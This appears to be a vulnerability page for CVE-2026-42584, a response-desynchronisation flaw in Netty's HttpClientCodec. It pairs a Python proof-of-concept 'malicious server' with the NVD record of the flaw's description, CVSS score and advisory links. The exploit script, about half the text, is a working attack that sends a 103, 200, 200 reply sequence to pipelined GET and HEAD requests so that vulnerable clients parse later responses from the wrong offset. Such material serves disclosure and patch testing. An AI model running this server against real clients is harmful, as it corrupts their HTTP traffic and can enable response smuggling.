CVE-2026-42584

import socket import time # Malicious server to trigger CVE-2026-42584 # Exploit condition: Client pipelines GET then HEAD, Server sends 103 -> 200 -> 200 def start_exploit_server(): server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server_socket.bind(('0.0.0.0', 8080)) server_socket.listen(1) print("[+] Malicious server listening on port 8080...") client_socket, addr = server_socket.accept() print(f"[+] Connection from {addr}") # Receive the pipelined requests (GET followed by HEAD) request_data = client_socket.recv(4096).decode('utf-8') print("[+] Received pipelined requests:") print(request_data) # Step 1: Send 103 Early Hints (1xx response) # This causes the vulnerable client to poll the queue for the first time (associating GET) print("[+] Sending 103 Early Hints...") response_103 = "HTTP/1.1 103 Early Hints\r\nLink: </style.css>; rel=preload; as=style\r\n\r\n" client_socket.send(response_103.encode('utf-8')) time.sleep(0.5) # Step 2: Send 200 OK with a body # The client polls the queue again (getting HEAD) and pairs it with this body. # The HEAD handler will skip the body, leaving bytes on the stream. print("[+] Sending 200 OK with body (intended for GET but paired with HEAD)...") response_body = "HTTP/1.1 200 OK\r\nContent-Length: 13\r\n\r\nHello, World!" client_socket.send(response_body.encode('utf-8')) time.sleep(0.5) # Step 3: Send 200 OK for the HEAD request # The client is now desynchronized and will parse this incorrectly. print("[+] Sending final 200 OK...") response_final = "HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n" client_socket.send(response_final.encode('utf-8')) client_socket.close() server_socket.close() print("[+] Exploit finished.") if __name__ == "__main__": start_exploit_server()

{"cve": {"id": "CVE-2026-42584", "sourceIdentifier": "[email protected]", "published": "2026-05-13T19:17:24.043", "lastModified": "2026-05-14T16:26:50.047", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpClientCodec pairs each inbound response with an outbound request by queue.poll() once per response, including for 1xx. If the client pipelines GET then HEAD and the server sends 103, then 200 with GET body, then 200 for HEAD, the queue pairs HEAD with the first 200. The HEAD rule then skips reading that message’s body, so the GET entity bytes stay on the stream and the following 200 is parsed from the wrong offset. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-444"}]}], "references": [{"url": "https://github.com/netty/netty/security/advisories/GHSA-57rv-r2g8-2cj3", "source": "[email protected]"}, {"url": "https://github.com/netty/netty/security/advisories/GHSA-57rv-r2g8-2cj3", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}